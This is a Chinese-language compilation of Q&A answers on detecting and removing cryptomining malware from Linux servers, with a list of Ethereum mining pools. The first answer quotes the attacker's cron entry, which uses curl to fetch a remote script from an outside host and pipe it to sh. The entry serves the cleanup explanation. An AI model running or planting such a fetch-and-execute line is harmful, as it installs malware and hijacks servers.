如何找出伺服器上的挖礦軟體

❶ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

❷ 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。

❸ 電腦挖礦怎麼挖呢電腦有什麼樣的配置呢

需要的配置：

❹ 以太坊礦池有哪些

1. Ethpool（Ethermine）ETHpool.org是第一個官方的以太坊礦池。此前由於工作量超負荷，該礦池不接受新用戶，只接受老客戶。因此，許多新礦工被迫轉向單獨挖礦，因為那時還沒有其他可替代的礦池。在Ethpool上挖礦，必須安裝以太坊的C++ETH版本。? 市場佔有率：23％? 當前礦池算力：399.1GH / s? 挖礦獎勵結算模式：PPLNS? 費率：1.0％? 網址：https://ethpool.org/2. NanopoolNanopool雖然是新礦池，但已經是目前以太坊上最大的礦池之一。份額（Share）的復雜性是靜態的，相當於50億。在該礦池上進行挖礦的最低哈希率僅為5 Mhesh / s。此外，此礦池根據PPLNS方案計算挖礦獎勵，其中N是最近10分鍾內所有接受的份額。（註：PPLNS全稱Pay Per Last N Shares，即根據最近的N個股份來支付收益。）Nanopool的伺服器遍及全球，官網頁面簡潔直觀。但是這個礦池的最低支付門檻相對較高，建議連接3個伺服器，避免等待長時間的付款期。? 市場佔有率：8％? 當前礦池算力：16,176.3GH / s? 挖礦獎勵結算模式：PPLNS? 費用：1.0％? 網址：https://eth.nanopool.org/3. F2Pool（魚池）F2Pool是2019年最受歡迎的礦池之一。F2pool的伺服器主要位於中國、其他亞洲國家和美國。F2pool.com因其開放性，可訪問性和易用性而備受礦工喜愛。礦工在F2Pool上注冊後才可以挖礦。以太坊挖礦需要一個顯卡礦機。 ? 市場佔有率：10％? 當前礦池算力：19.38TH / s? 挖礦獎勵結算模式：PPS+? 費率：2.5％? 網址：https://www.f2pool.com/4. Sparkpool（星火礦池）在ETH，GRIN和BEAM生態系統中，最強大的中國資源庫是Sparkpool，它是與全球礦工合作的開放資源。在挖礦之前，你需要配置礦機。基於AMD GPU處理器的以太坊挖礦收益更高。它需要快閃記憶體改進的BIOS並調整MSI Afterburner或AMD驅動程序設置中的超頻選項。 ? 市場佔有率：29％? 當前礦池算力：56.96TH / s? 挖礦獎勵結算模式：PPS +? 費用：1.0％? 網址：https://www.sparkpool.com/5. Dwarfpool在DwarfPool，礦工的信用等級分為RBPPS或HBPPS。使用RBPPS，只要有A值，你就可以獲得對應獎勵（死塊除外）。HBPPS計提演算法是基於時間的股份支付。每小時計算一次所有推廣和發現的區塊。該礦池具有經過優化的最佳挖礦引擎，拒絕率較低，透明且詳細的統計信息。每小時進行一次支付結算，伺服器遍布世界各地。? 市場佔有率：6％? 當前礦池算力：2377109 MH / s? 挖礦獎勵結算模式：HBPPS? 費用：1.0％? 網址：https://dwarfpool.com/6. MiningPoolHubMiningPoolHub允許礦工通過挖礦獲利，並根據不同支付系統的匯率來交易數字貨幣。該礦池使用PPLNS演算法確定用戶獎勵。提款手續費為0.9％。? 市場份額：3.7％? 當前礦池算力：7.05T / s? 挖礦獎勵類型：PPLNS? 費用：1.0％?

❺ 如何用Linux伺服器挖礦教程

今天早上起來一看，伺服器腳本一個都沒有啟動!甚是奇怪，遠程登錄伺服器，也是異常的卡，直到最後卡死，只好重新啟動伺服器!
啟動之後沒一會又會變卡，越來越卡，top查看進程！不覺又奇怪的進程，因為平常也不經常看！所以自己也搞不明白怎麼回事兒！只好到群里問了問，說是被挖礦的掛了木馬文件了，是由於redis的漏洞!
後來我自己發現，原來redis遠程可以直接登錄，原以為redis和mysql不開放登錄許可權就不會支持遠程登錄呢，看來是我想多了
看了好長時間才發現一個異常的進程，自啟的進程 molibe ！
找到進程位置 ps -ef|grep molibe ;
在tmp目錄下，打開一看的確是有
chmod -x molibe 取消執行許可權在來到/var/spool/cron下，cat root 查看定時器的執行發現之前腳本都被改了，顧不得刪除cron，service crond restart 重新啟動,再有就時kill 掉molibe進程
這樣大概整個就結束了！但是根本是因為redis漏洞，所以還是補上吧
首先修改redis'埠,找到redis.conf文件 port **** 修改埠號再有就是必須修改密碼 # requirepass ******** 去除#號重新啟動 /redis/src/redis-server /redis/redis-conf
啟動成功之後
redis/redis-cli -p ****(埠) -a *****(密碼)